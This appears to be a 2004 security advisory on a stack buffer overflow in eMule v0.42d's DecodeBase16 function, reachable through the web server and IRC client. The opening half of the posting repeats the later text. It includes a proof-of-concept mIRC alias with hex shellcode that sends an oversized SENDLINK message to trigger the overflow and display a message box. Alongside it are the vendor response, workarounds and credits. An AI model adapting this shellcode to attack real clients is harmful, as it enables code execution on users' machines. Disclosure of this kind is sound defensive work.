A vulnerability exists in eMule v0.42d (and probably earlier versions)
in the DecodeBase16(...) function. This function takes an hexadecimal
string, its length, and a destination buffer (on the stack) as
parameters. The function decodes whatever is supplied, no length check
is performed on the string nor on the buffer, leading to a possible
stack overflow.
The function is called 5 times in the code: 3 times in the web server
(which may require authentication) and 2 times in the IRC client (not
connected by default).
Bourriquet is an mIRC alias exploiting this overflow in v0.42d via the
SENDLINK command, it calls MessageBoxA (to display 'Patch your eMule !')
and then ExitProcess :
The flaw was reported to bluecow from the eMule Team on March, 30th
2004 on IRC. He stated the issue would be patched in the upcoming eMule
release, available here:
http://www.emule-project.net/home/perl/news.cgi?l=1&cat_id=22
An effort was also done in changing the IRC server address and kicking
out vulnerable clients (nice work :)
Solution/Workaround
-------------------
The following options are available:
- upgrade to eMule version 0.42e,
- do not use the eMule web server and IRC client,
- uninstall eMule :)
Credits
-------
The vulnerability was discovered by Kostya Kortchinsky, from CERT
RENATER, on March 24th 2004, following a FHP meeting and a remark from
nico : "eMule and all these P2P tools are better than VNC to get remote
access to a box".
Greetings to the people of the French Honeynet Project, MISC Magazine
and #fee1dead@EFnet.
Advertising
-----------
CanSecWest/core04 : Top security experts. Cutting edge techniques and
information.
Vancouver, Canada - April 21-23 2004 - http://cansecwest.com
Symposium sur la Sécurité des Technologies de l'Information et des
Communications
Rennes, France - June 2-4 2004 - http://sstic.org
eMule v0.42d Buffer Overflow
Description
-----------
A vulnerability exists in eMule v0.42d (and probably earlier versions)
in the DecodeBase16(...) function. This function takes an hexadecimal
string, its length, and a destination buffer (on the stack) as
parameters. The function decodes whatever is supplied, no length check
is performed on the string nor on the buffer, leading to a possible
stack overflow.
The function is called 5 times in the code: 3 times in the web server
(which may require authentication) and 2 times in the IRC client (not
connected by default).
uchar userid[16];
DecodeBase16(hash.GetBuffer(),hash.GetLength(),userid);
Proof of concept
----------------
Bourriquet is an mIRC alias exploiting this overflow in v0.42d via the
SENDLINK command, it calls MessageBoxA (to display 'Patch your eMule !')
and then ExitProcess :
/bourriquet { .quote PRIVMSG $1
$+(:,$chr(1),SENDLINK|,9090909090909090909090909090909090909090909090909
090909090909090909090909090909090909090909090909090909090909090909090909
0909090909090909090909090909090EB0790907AF65700906681EC400031C9682021000
0684D756C656875722065686820796F685061746389E2515152513EFF15C0E76100503EF
F1568E461009090909090909090909090909090909090909090909090909090909090909
090909090909090909090909090909090909090909090909090909090909090,|,$chr(1
))
}
Developer response
------------------
The flaw was reported to bluecow from the eMule Team on March, 30th
2004 on IRC. He stated the issue would be patched in the upcoming eMule
release, available here:
http://www.emule-project.net/home/perl/news.cgi?l=1&cat_id=22
An effort was also done in changing the IRC server address and kicking
out vulnerable clients (nice work :)
Solution/Workaround
-------------------
The following options are available:
- upgrade to eMule version 0.42e,
- do not use the eMule web server and IRC client,
- uninstall eMule :)
Credits
-------
The vulnerability was discovered by Kostya Kortchinsky, from CERT
RENATER, on March 24th 2004, following a FHP meeting and a remark from
nico : "eMule and all these P2P tools are better than VNC to get remote
access to a box".
Greetings to the people of the French Honeynet Project, MISC Magazine
and #fee1dead@EFnet.
Advertising
-----------
CanSecWest/core04 : Top security experts. Cutting edge techniques and
information.
Vancouver, Canada - April 21-23 2004 - http://cansecwest.com
Symposium sur la Sécurité des Technologies de l'Information et des
Communications
Rennes, France - June 2-4 2004 - http://sstic.org
See you there,
Kostya.
[ reply ]